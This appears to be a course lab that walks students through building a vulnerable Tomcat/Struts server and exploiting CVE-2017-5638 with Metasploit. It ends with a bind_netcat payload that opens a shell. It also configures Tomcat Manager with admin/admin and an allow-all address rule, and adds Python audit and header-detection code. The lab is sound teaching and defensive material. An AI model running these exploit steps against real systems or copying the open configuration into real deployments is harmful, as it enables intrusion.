Note that this is NOT the very latest exploit, released Sept 5, 2017. For that exploit, see this project.
This exploit was released in March of 2017.
Download the latest version of Ubuntu 16.04 server. When I looked, the latest version was 16.04.03, 64-bit only.
For VMware Fusion on a Mac, the steps are:
Username: student Password: student
On your Ubuntu console, execute this command:
sudo apt update
Enter the password student when you are prompted to.
On your Ubuntu console, execute these commands:
sudo apt install openssh-server -y
ifconfig
On a Mac, in a Terminal window, execute this command, replacing the IP address with the IP address of your Ubuntu server.
Add the server fingerprint when you are prompted to.
Enter the password student when you are prompted to.
ssh student@172.16.1.198
If you are using Windows, install PuTTY and use it to connect to your Ubuntu server.
Accept the agreement.
Download jdk-8u144-linux-x64.tar.gz
On a Mac host, open a new Terminal window and execute these commands to move the Java installer file to the server, replacing the IP address with the IP address of your Ubuntu server.
Enter the password student when you are prompted to.
cd
cd Downloads
scp ./jdk-8u144-linux-x64.tar.gz student@172.16.1.198:/tmp
If you are using Windows, you can move files to your server with SSHSecureShellClient, which you can get here:
In the SSH session controlling your Ubuntu server, execute these commands:
cd /tmp
tar -xvf jdk-8u144-linux-x64.tar.gz
sudo mkdir -p /usr/lib/jvm
Enter the password student if you are prompted to.
In the SSH session controlling your Ubuntu server, execute these commands:
sudo mv ./jdk1.8.0* /usr/lib/jvm/
sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_144/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_144/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_144/bin/javaws" 1
sudo chmod a+x /usr/bin/java
sudo chmod a+x /usr/bin/javac
sudo chmod a+x /usr/bin/javaws
sudo chown -R root:root /usr/lib/jvm/jdk1.8.0_144
sudo update-alternatives --config java
sudo update-alternatives --config javac
sudo update-alternatives --config javaws
If you see "nothing to configure" that's OK.
In the SSH session controlling your Ubuntu server, execute this command:
java -version
You should see a version number, as shown below.
In the SSH session controlling your Ubuntu server, execute these commands:
cd /tmp
wget http://apache.mirrors.hoobly.com/tomcat/tomcat-9/v9.0.0.M26/bin/apache-tomcat-9.0.0.M26.tar.gz
tar xvzf apache-tomcat-9.0.0.M26.tar.gz
sudo mkdir /usr/local/tomcat
sudo mv apache-tomcat-9.0.0.M26/* /usr/local/tomcat
In the SSH session controlling your Ubuntu server, execute these commands:
cd
nano .bashrc
Add this line to the bottom of the file, as shown below.
export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_144
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command to set the new environment variable:
source .bashrc
In the SSH session controlling your Ubuntu server, execute this command to start Tomcat:
/usr/local/tomcat/bin/startup.sh
Tomcat starts, as shown below.
On your host system, in a Web browser, open this URL, replacing the IP address with the IP address of your Ubuntu server.
http://172.16.1.178:8080/
You see an Apache Tomcat page, as shown below.
sudo apt update
sudo apt install unzip
cd
wget http://archive.apache.org/dist/struts/2.5.10/struts-2.5.10-all.zip
unzip struts-2.5.10-all.zip
mv struts-2.5.10 struts2
cd /tmp
wget http://mirror.metrocast.net/apache/maven/maven-3/3.5.0/binaries/apache-maven-3.5.0-bin.tar.gz
sudo tar xvzf apache-maven*.tar.gz -C /opt/
cd
nano .bashrc
Add this line to the bottom of the file, as shown below.
export PATH=$PATH:/opt/apache-maven-3.5.0/bin
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command to set the new environment variable:
source .bashrc
In the SSH session controlling your Ubuntu server, execute this command:
mvn -version
You see a version number, as shown below.
cd
mvn archetype:generate \
-DgroupId=com.tutorialforlinux \
-DartifactId=myWebApp \
-DarchetypeArtifactId=maven-archetype-webapp
Many pages of "Downloading" messages scroll by.
When you see the message: "Define value for property 'version' 1.0-SNAPSHOT: :", press Enter.
When you see the message: "Y: :", press Enter.
You see a "BUILD SUCCESS" message, as shown below.
In the SSH session controlling your Ubuntu server, execute these commands:
cd myWebApp
nano pom.xml
The file opens, as shown below.
This is an XML configuration file.
At the bottom of the file, in the "build" section, change myWebApp to basic_struts, so it is as shown below:
<build>
<finalName>basic_struts</finalName>
</build>
At the bottom of the file, in the "dependencies" section, add a new "dependency" section, as shown below:
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-core</artifactId>
<version>2.5.10</version>
</dependency>
Save the file with Ctrl+X, Y, Enter.
To make your web app, in the SSH session controlling your Ubuntu server, execute this command:
mvn clean package
Many pages of "Downloading" messages scroll by, ending with a green "BUILD SUCCESS" message, as shown below.
This has created a "war" file, ready to deploy, at this location:
~/myWebApp/target/basic_struts.war
However, we don't actually need that application. We'll deploy a different one later.
cd
nano .bashrc
Add this line to the bottom of the file, as shown below.
export CATALINA_HOME=/usr/local/tomcat
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command to set the new environment variable:
source .bashrc
Now we need to adjust the Tomcat configuration to allow administration from remote addresses.
In the SSH session controlling your Ubuntu server, execute this command:
sudo nano $CATALINA_HOME/conf/tomcat-users.xml
The "tomcat-users" section contains only comments, as shown below.
Insert these lines into the "tomcat-users" section, as shown below.
<role rolename="manager-gui" />
<user username="admin" password="admin" roles="manager-gui"/>
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute this command:
sudo nano $CATALINA_HOME/conf/Catalina/localhost/manager.xml
Insert these lines into the file, as shown below.
<Context privileged="true" antiResourceLocking="false"
docBase="${catalina.home}/webapps/manager">
<Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="^.*$" />
</Context>
Save the file with Ctrl+X, Y, Enter.
In the SSH session controlling your Ubuntu server, execute these commands to restart Tomcat. It may take a few minutes to shut down the first time--that's OK.
sudo $CATALINA_HOME/bin/shutdown.sh
sudo $CATALINA_HOME/bin/startup.sh
Tomcat restarts, as shown below.
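The two edits above leave the Manager application reachable from any client address with admin/admin credentials. The following Python audit is an added example, not part of the original lab: the file contents are constructed copies of those edits, and the tightened pattern with a 172.16.1.1 admin workstation is an assumption.

```python
import re
import xml.etree.ElementTree as ET

# Constructed copies of the two files as this lab edits them.
LAB_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui" />
  <user username="admin" password="admin" roles="manager-gui"/>
</tomcat-users>"""
LAB_CONTEXT = r"""<Context privileged="true" antiResourceLocking="false"
         docBase="${catalina.home}/webapps/manager">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="^.*$" />
</Context>"""
# Hypothetical tightened valve: loopback plus one assumed admin workstation.
TIGHT_CONTEXT = LAB_CONTEXT.replace("^.*$", r"127\.\d+\.\d+\.\d+|::1|172\.16\.1\.1")

GUESSABLE = {"admin", "tomcat", "manager", "password", "changeit"}  # illustrative list
OUTSIDE = ("203.0.113.7", "198.51.100.23", "2001:db8::1")  # documentation ranges

def _local(tag):
    """Drop the XML namespace so <user> matches with or without xmlns."""
    return tag.rsplit("}", 1)[-1]

def audit_users(xml_text):
    """Flag manager/admin accounts whose password is the username or a common default."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name, pw = el.get("username", ""), el.get("password", "")
        roles = [r.strip() for r in el.get("roles", "").split(",")]
        privileged = [r for r in roles if r.startswith(("manager", "admin"))]
        if privileged and (pw == name or pw.lower() in GUESSABLE):
            findings.append(f"{name}: guessable password on {','.join(privileged)}")
    return findings

def audit_context(xml_text):
    """Flag RemoteAddrValve patterns that admit addresses outside the lab network."""
    findings, seen = [], False
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) == "Valve" and el.get("className", "").endswith("RemoteAddrValve"):
            seen = True
            allow = el.get("allow", "")
            # Tomcat matches the pattern against the whole address, hence fullmatch.
            hits = [ip for ip in OUTSIDE if allow and re.fullmatch(allow, ip)]
            if hits:
                findings.append(f"allow={allow!r} admits {', '.join(hits)}")
    if not seen:
        findings.append("no RemoteAddrValve: no address restriction in this file")
    return findings
```

Run `audit_users` against the real tomcat-users.xml and `audit_context` against manager.xml by passing each file's text.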
http://172.16.1.198:8080/manager
A box pops up asking for credentials. Enter these credentials:
Username: admin
Password: admin
In the "Tomcat Web Application Manager" page, scroll down to the "Deploy" section, as shown below.
If you can't open the manager page, check the log with the command below. When I did it, I had an error in the manager.xml file.
nano /usr/local/tomcat/logs/catalina.out
https://github.com/nixawk/labs/blob/master/CVE-2017-5638/struts2_2.3.15.1-showcase.war
On the right side, click the Download button.
You get a file named struts2_2.3.15.1-showcase.war
Navigate to your Downloads folder and double-click the struts2_2.3.15.1-showcase.war file.
Click the Deploy button.
The Tomcat page now shows the /struts2_2.3.15.1-showcase application at the bottom of the Applications section, as shown below.
Click /struts2_2.3.15.1-showcase.
The "Struts2 Showcase" page appears, as shown below.
Save a whole-desktop screen capture with a filename of "Proj 9xa from YOUR NAME".
In a Terminal window, execute these commands to update Metasploit:
apt update
apt install metasploit-framework
In Kali, execute this command to launch Metasploit:
msfconsole
In Metasploit, execute this command to find "struts" exploits:
search struts
Several exploits are found, as shown below. We'll use the first one, from March of 2017.
In Metasploit, execute these commands to select the exploit, show options, set the target and vulnerable URI, and exploit it.
Replace the IP address with the IP address of your Ubuntu server.
use exploit/multi/http/struts2_content_type_ognl
show options
set RHOST 172.16.1.178
set TARGETURI /struts2_2.3.15.1-showcase/showcase.action
exploit
The exploit fails, as shown below.
What's the problem? When all else fails, consult the documentation.
Open this page:
https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl
The documentation says to try a "cmd/*" payload, as shown below.
In Metasploit, execute this command to show the available payloads:
show payloads
Scroll back up several pages to see the "cmd" payloads, as shown below.
In Metasploit, execute these commands to set the current payload to "cmd/unix/generic", and show its options:
set PAYLOAD cmd/unix/generic
show options
We need to choose a Linux command and put it in the "CMD" parameter, as shown below.
In Metasploit, execute these commands to set CMD to "touch /tmp/foo" and exploit the target:
set CMD "touch /tmp/foo"
exploit
The exploit completes, as shown below.
In the SSH session controlling your Ubuntu server, execute this command:
ls -l /tmp
The file "foo" was created, as shown below. We have some control of the target!
In Metasploit, execute these commands to use the "cmd/unix/bind_netcat" payload and exploit the target:
set PAYLOAD cmd/unix/bind_netcat
exploit
The exploit completes, as shown below, and opens a shell. There is no prompt, but you can execute commands like "whoami" and "ls".
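The module name struts2_content_type_ognl says where this attack is visible to a defender: the OGNL expression travels in the request's Content-Type header. The following Python check is an added example, not part of the original lab or of Metasploit. The two requests are constructed samples, and the check flags a Content-Type that carries an expression marker or is not a well-formed media type.

```python
import re

# RFC 7230 "token" characters; note that { } ( ) are not among them.
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
# type/subtype followed by optional ;name=value parameters (RFC 7231 media-type).
MEDIA_TYPE = re.compile(
    rf'{TOKEN}/{TOKEN}(?:[ \t]*;[ \t]*{TOKEN}=(?:{TOKEN}|"[^"\\]*"))*[ \t]*')
# Expression openers that have no place in a media type.
EXPR_MARK = re.compile(r"[%$]\{")

# Constructed sample requests; the path comes from the lab, header values are made up.
NORMAL = "\r\n".join([
    "POST /struts2_2.3.15.1-showcase/showcase.action HTTP/1.1",
    "Host: 172.16.1.178:8080",
    "Content-Type: multipart/form-data; boundary=----lab1234",
    "", ""])
SUSPECT = "\r\n".join([
    "GET /struts2_2.3.15.1-showcase/showcase.action HTTP/1.1",
    "Host: 172.16.1.178:8080",
    "content-type: %{(constructed)}.multipart/form-data",
    "", ""])

def content_types(raw_request):
    """Return every Content-Type value in the header block (names are case-insensitive)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":
            values.append(value.strip())
    return values

def inspect_request(raw_request):
    """Return the reasons this request's Content-Type looks abnormal, or []."""
    values = content_types(raw_request)
    reasons = ["duplicate Content-Type headers"] if len(values) > 1 else []
    for value in values:
        if EXPR_MARK.search(value):
            reasons.append("expression marker in Content-Type")
        elif not MEDIA_TYPE.fullmatch(value):
            reasons.append("Content-Type is not a valid media type")
    return reasons

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("suspect", SUSPECT)):
        print(label, inspect_request(req) or "ok")
```

Tomcat's default access log does not record Content-Type, so this check has to run where request headers are visible, such as a reverse proxy or a packet capture.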
Save a whole-desktop screen capture with a filename of "Proj 9xb from YOUR NAME".
Email the image to cnit.124@gmail.com with a subject of "Project 9x from YOUR NAME".